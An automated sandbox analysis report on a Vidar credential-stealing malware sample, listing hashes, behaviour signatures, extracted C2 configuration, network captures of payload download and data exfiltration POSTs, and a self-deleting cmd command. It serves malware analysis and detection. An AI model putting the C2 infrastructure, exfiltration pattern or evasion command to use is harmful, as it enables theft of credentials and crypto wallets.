Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	756295
MD5:	5367709f0a96713b5c9a518e13f306d6
SHA1:	244bdcc9a3548101cacc9c4f8912fb8631764b40
SHA256:	2cc0be582a350f1eafb6d3c6cc713393098a6936346a9070ba55abd346dfb090
Tags:	exe
Infos:

Detection

Vidar

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Vidar stealer

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Self deletion via cmd or bat file

Machine Learning detection for sample

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Uses a known web browser user agent for HTTP communication

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 5884 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)

file.exe (PID: 5924 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)

file.exe (PID: 5896 cmdline: C:\Users\user\Desktop\file.exe MD5: 5367709F0A96713B5C9A518E13F306D6)

cmd.exe (PID: 5984 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 3384 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Configuration

Threatname: Vidar

{"C2 url": "https://t.me/asifrazatg", "Botnet": "1148"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5896	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 5896	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5896	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x43c08:$a1: BinanceChainWallet 0x43c1b:$a1: BinanceChainWallet 0x45d03:$a2: wallet.dat 0x6830e:$b1: CC\%s_%s.txt 0x6834d:$b2: History\%s_%s.txt 0x68cfd:$b2: History\%s_%s.txt 0x68339:$b3: Autofill\%s_%s.txt 0x68ce9:$b3: Autofill\%s_%s.txt
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
1.3.file.exe.526a20.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.file.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
2.2.file.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
1.3.file.exe.526a20.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.7fb280.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.7fb280.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Code function: 2_2_0040A392 __EH_prolog3_GS,_memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

2_2_0040A392

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://t.me/asifrazatg

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
Source: global traffic	HTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 149.154.167.99 149.154.167.99

Source: global traffic

HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 29 Nov 2022 23:10:04 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71
Source: unknown	TCP traffic detected without corresponding DNS query: 88.198.94.71

Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://116.202.6.206:80
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71/
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71/1148
Source: file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71/233910279258.zip
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71:80/233910279258.zip
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71:80/233910279258.zip8C
Source: file.exe, 00000002.00000002.244899570.00000000001AD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://88.198.94.71:80/233910279258.zipd87633a38bb03555514232-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.245137168.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257451716.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 58308559385186415876143610.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: file.exe, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199439929669
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: file.exe, file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asifrazatg
Source: file.exe, 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asifrazatg&
Source: file.exe, 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/asifrazatghttps://steamcommunity.com/profiles/76561199439929669http://116.202.6.206:80p
Source: file.exe, 00000002.00000003.234690206.0000000000764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 11565709257171813179063097.2.dr, 58308559385186415876143610.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4550768666964492Host: 88.198.94.71Content-Length: 110914Connection: Keep-AliveCache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: t.me

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_0040E905 _memset,_memset,_memset,GetProcessHeap,RtlAllocateHeap,_memset,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,_memmove,lstrlenA,_memmove,lstrlenA,lstrlenA,_memmove,lstrlenA,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,_memset,lstrcat,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_0040E905

Source: global traffic	HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /1148 HTTP/1.1Host: 88.198.94.71
Source: global traffic	HTTP traffic detected: GET /233910279258.zip HTTP/1.1Host: 88.198.94.71Cache-Control: no-cache

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49707 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 2_2_004182AF _memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_004182AF

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Process Memory Space: file.exe PID: 5896, type: MEMORYSTR

Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041E31F	2_2_0041E31F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00406050	2_2_00406050
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00405850	2_2_00405850
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042101A	2_2_0042101A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004069EB	2_2_004069EB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0043127F	2_2_0043127F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00432BE4	2_2_00432BE4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004213EC	2_2_004213EC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00420C7C	2_2_00420C7C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00430D2E	2_2_00430D2E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041B5A7	2_2_0041B5A7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00421E20	2_2_00421E20
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00431EAC	2_2_00431EAC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0041D766	2_2_0041D766
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00407F35	2_2_00407F35
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004317D0	2_2_004317D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004217D4	2_2_004217D4
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004207E7	2_2_004207E7

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00404114 appears 74 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00423610 appears 38 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00428900 appears 44 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00423679 appears 41 times

Source: file.exe, 00000000.00000000.231270305.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000001.00000002.232909854.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe, 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameHelper.exe. vs file.exe

Source: file.exe	ReversingLabs: Detection: 32%
Source: file.exe	Virustotal: Detection: 36%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@10/6@1/2

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000002.00000002.255872919.0000000026C8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000002.257360113.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
